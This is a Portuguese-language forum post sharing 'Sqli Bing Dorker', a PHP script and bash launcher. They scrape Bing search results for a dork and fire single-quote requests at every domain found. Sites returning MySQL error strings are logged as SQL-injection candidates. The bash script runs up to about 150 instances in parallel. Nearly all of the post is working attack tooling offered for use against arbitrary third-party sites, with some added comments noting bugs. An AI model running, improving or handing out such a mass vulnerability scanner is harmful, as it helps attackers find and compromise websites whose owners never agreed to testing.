Script simples que tem como função a captura de sites via Bing para verificação de SQLi.
Feito isso o script gera o log com os resultados.
PHP Code:
Bash code:
Youtube:
[]'s
Feito isso o script gera o log com os resultados.
PHP Code:
Código PHP:
<?php
/*
* php bing-dorker.php dork
* sh bing-dorker.sh dork_file
* sqli_vulns.txt to results.
*
* php -> http://pastebin.com/VWMbSw7r
* bash -> http://pastebin.com/ZE6V1m0E
* https://www.youtube.com/watch?v=Li2xNPDbzOU
*
* http://Janissaries.org
* 2013
* */
set_time_limit(0); // no execution-time cap: the run lasts as long as the loops below keep going
error_reporting(0); // silences every warning/notice, so failed fopen()/curl/file() calls below go unreported
class Colors {
    // ANSI SGR codes keyed by colour name; only foreground colours are defined.
    private $foreground_colors = array();
    private $background_colors = array();

    public function __construct() {
        $this->foreground_colors = array(
            'light_blue'  => '1;34',
            'light_green' => '1;32',
            'white'       => '1;37',
        );
    }

    /**
     * Wraps $string in ANSI colour escapes. Unknown or null colour names are
     * ignored; the reset sequence is always appended.
     */
    public function getColoredString($string, $foreground_color = null, $background_color = null) {
        $prefix = '';
        if (isset($this->foreground_colors[$foreground_color])) {
            $prefix .= "\033[{$this->foreground_colors[$foreground_color]}m";
        }
        if (isset($this->background_colors[$background_color])) {
            $prefix .= "\033[{$this->background_colors[$background_color]}m";
        }
        return $prefix . $string . "\033[0m";
    }

    /** Names of the known foreground colours. */
    public function getForegroundColors() {
        return array_keys($this->foreground_colors);
    }

    /** Names of the known background colours (none are defined). */
    public function getBackgroundColors() {
        return array_keys($this->background_colors);
    }
}
$c = new Colors; // global colour helper used by the CLI banner at the bottom of the file
function save_content($content, $file){
    // Appends one CRLF-terminated record to $file. Nothing is returned and a
    // failed open is not handled (fwrite would then receive false).
    $handle = fopen($file, 'a');
    fwrite($handle, "{$content}\r\n");
    fclose($handle);
}
function sec($site){
    // Takes the first "http://.../index.php" prefix of $site, drops the "index.php" part and
    // forces a "www." host prefix when the match does not already contain "www".
    // With no match the result is an empty string (the "@" hides the undefined-offset notice).
    // Not called anywhere in this file.
    preg_match_all('{http://(.*?)(/index.php)}siU', $site, $found);
    $prefix = @$found[0][0];
    $base = str_replace("index.php", "", $prefix);
    if (preg_match("/www/", $prefix)) {
        return $base;
    }
    return str_replace("http://", "http://www.", $base);
}
function sqli($host, $threads){
    // Requests "http://<host>'" for every entry of $host, $threads handles at a time through
    // curl_multi, and appends each host whose response body matches the error-string regex
    // below to sqli_vulns.txt. From the server side, the trailing single quote and the fixed
    // Firefox 22 User-Agent are the request's distinguishing features in access logs.
    $sqli = "sqli_vulns.txt"; // sqli vulns.
    $multi = curl_multi_init();
    $bol = array_chunk($host, $threads);
    $cntz = 1;
    foreach($bol as $site){
        // NOTE(review): $ch and $grep are never reset between chunks, so a later, smaller chunk
        // still iterates stale handles (and undefined $site offsets) left by an earlier one —
        // looks like a defect, verify.
        for($i=0;$i<=count($site)-1;$i++){
            $ch[$i] = curl_init();
            curl_setopt($ch[$i], CURLOPT_URL, 'http://'.$site[$i].'\'');
            curl_setopt($ch[$i], CURLOPT_FOLLOWLOCATION, TRUE);
            curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, TRUE);
            curl_setopt($ch[$i], CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0");
            curl_setopt($ch[$i], CURLOPT_TIMEOUT, 8);
            curl_multi_add_handle($multi, $ch[$i]);
        }
        // Busy-wait (1 µs sleeps) until curl_multi_exec() reports no running handles in $handle.
        do{
            curl_multi_exec($multi, $handle);
            usleep(1);
        }while($handle>0);
        foreach($ch as $ch_id => $cnt)
        {
            $grep[$ch_id] = curl_multi_getcontent($cnt);
            curl_multi_remove_handle($multi,$cnt);
            print "[$cntz] Fuzzing!!!\n";
            // Case-sensitive match; the bare "SQL" alternative matches any page mentioning it,
            // and each "()" is an empty PCRE group, so "mysql_num_rows" matches with or without
            // parentheses. Expect false positives.
            if(preg_match('/Mysql_|SQL|mysql_num_rows()|mysql_fetch_assoc()|mysql_result()|mysql_fetch_array()|mysql_numrows()|mysql_preg_match()/',$grep[$ch_id]))
            {
                $fp = fopen($sqli, "a");
                fwrite($fp, $site[$ch_id]."\n");
                fclose($fp);
                flush();
            }
            $cntz++;
        }
    }
}
function parse_content($file){
    // Rewrites $file in place with duplicate and empty lines removed (array_filter also drops a
    // line that is exactly "0"), using CRLF line endings, then prints a summary with the
    // resulting line count. If nothing survives the filter the file is not recreated.
    $lines = explode("\n", file_get_contents($file));
    $kept = array_filter(array_unique($lines));
    unlink($file);
    foreach ($kept as $line) {
        file_put_contents($file, $line . "\r\n", FILE_APPEND);
    }
    print "\n\n";
    print "======================================\n";
    print "[+] FinisheD! All content parsed in => $file\n";
    print "Total urls: [".count(file($file))."]\n";
    print "======================================\n";
    print "Fuzzing sites to sqli\n";
    flush();
}
function ger_log(){
    // Creates an empty "<rand()>_tmp" file in the current directory and returns its name.
    // rand() is neither unpredictable nor collision-free: two concurrent runs (the companion
    // shell script starts many) can pick the same name and append to the same file.
    $name = rand() . "_tmp";
    fclose(fopen($name, "a"));
    return $name;
}
function bing($dork,$log){
    // Pages through Bing web results for $dork (10 per page), pulls every href out of
    // '<h3><a href="...">', strips the scheme and "www.", skips a few hard-coded domains and
    // appends each new entry to $log via save_content(). Returns false when Bing reports
    // "No results found for" or a page yields no anchors.
    $c = new Colors; // shadows the global $c
    $array = array(); // entries already written to $log (in-memory de-duplication)
    print "Dork: [".$dork."]\n";
    $pageNum = 0;
    // "true ||" short-circuits, so the 50000 page cap is dead code; the loop only ends through
    // the two "return false" paths below.
    while(true || $pageNum <= 50000)
    {
        $bing = "http://www.bing.com/search?q=".str_replace(" ","+",$dork)."&go=&filt=all&first=".$pageNum."";
        // Connect_Host() is called twice per page: once for this check, once for the parse.
        if(!preg_match("/No results found for/",Connect_Host($bing)))
        {
            preg_match_all("/<h3><a href=\"(.*?)\">/",Connect_Host($bing),$sites);
            if(count($sites[1])==0)
            {return false;}
            echo $c->getColoredString("[+]Greping results at page => $pageNum\n", "light_green", "");
            for($i=0 ; $i < count($sites[1]);$i++)
            {
                $site = str_replace(array("http://","https://","www."),"",$sites[1][$i]);
                // Cuts at the last '"'; when there is none strrpos() returns false, which substr()
                // treats as length 0 and the entry collapses to "" — verify against live markup.
                $site = substr($site, 0, strrpos( $site, '"') );
                $site = str_replace("\" h=", "", $site);
                if(!in_array($site,$array))
                {
                    // Domain deny-list is matched against the raw href, not the stripped $site.
                    if(!preg_match("/msn|htmlstaff|facebook|imasters|revistaphp|debian/", $sites[1][$i]))
                    {
                        //echo $site."\n";
                        array_push($array,$site);
                        flush();
                        save_content($site,$log);
                    }
                }
            }
            $pageNum += 10;
        }
        else{echo "No results \n";flush();return false;}
    }
    // Leftover, commented-out code from an earlier version.
    //$array = array_unique($uSites);
    //for($i=0;$i<count($array);$i++){echo $array[$i]."<br />";}
}
function Connect_Host($url)
{
    // Fetches $url with curl (response headers included, redirects followed, 30 s timeout).
    // Returns the raw response, or 0 when curl_exec() produced nothing truthy. The handle is
    // never closed explicitly.
    $handle = curl_init();
    curl_setopt_array($handle, array(
        CURLOPT_FOLLOWLOCATION => 1,
        CURLOPT_HEADER         => 1,
        CURLOPT_URL            => $url,
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_TIMEOUT        => 30,
    ));
    $response = curl_exec($handle);
    return $response ? $response : 0;
}
// CLI entry point: expects the dork as the first argument and silently does nothing otherwise
// (no usage message; a dork of "0" fails the truthiness test).
if($argv[1])
{
    $dork = trim("$argv[1]");
    $log = ger_log(); // scratch file in the current directory, removed at the end
    $threads = "10"; // Threads to check sqli (string, coerced by array_chunk)
    echo $c->getColoredString("+------------------------------------------------------+", "white", "")."\n";
    echo $c->getColoredString("Sqli Bing Dorker by n4sss\n", "light_green", "");
    echo $c->getColoredString("Dork: ".$dork."\n", "white", "");
    echo $c->getColoredString("+------------------------------------------------------+", "white", "")."\n";
    // Pipeline: collect hosts -> de-duplicate the scratch file -> probe each host -> clean up.
    bing($dork, $log);
    parse_content($log);
    $loq = explode("\n", file_get_contents($log));
    sqli($loq, $threads);
    unlink($log);
}
?>
Código:
#!/bin/bash
# Starts one background "php bing-dorker.php <dork>" per unique line of the file given as $1,
# throttled by counting running php processes, then prints how long the launches took.
datainicial=`date +%s`
printf "=========================\n"
printf "Sqli Bing dorker by n4sss\n"
printf "=========================\n"
# De-duplicate the dork list into a scratch file (removed at the end).
cat $1 | sort | uniq > mfu.txt
CONTOR=0
for i in `cat mfu.txt`
do
    # "grep -c php" also counts the grep itself and any unrelated php process, so the throttle is approximate.
    CONTOR=`ps aux | grep -c php`
    while [ $CONTOR -ge 150 ];do
        CONTOR=`ps aux | grep -c php`
        echo "Sleeping"
        sleep 5
    done
    if [ $CONTOR -le 150 ]; then
        php bing-dorker.php $i > /dev/null &
    fi
done
datafinal=`date +%s`
soma=`expr $datafinal - $datainicial`
# 10800 s (3 h) is added before formatting — presumably a timezone offset workaround for "date -d @"; verify.
resultado=`expr 10800 + $soma`
tempo=`date -d @$resultado +%H:%M:%S`
printf "Time to launch stances: $tempo\n"
printf "All ps in bg now!\n"
printf "Check with ps aux | grep php to more information\n"
rm mfu.txt
[]'s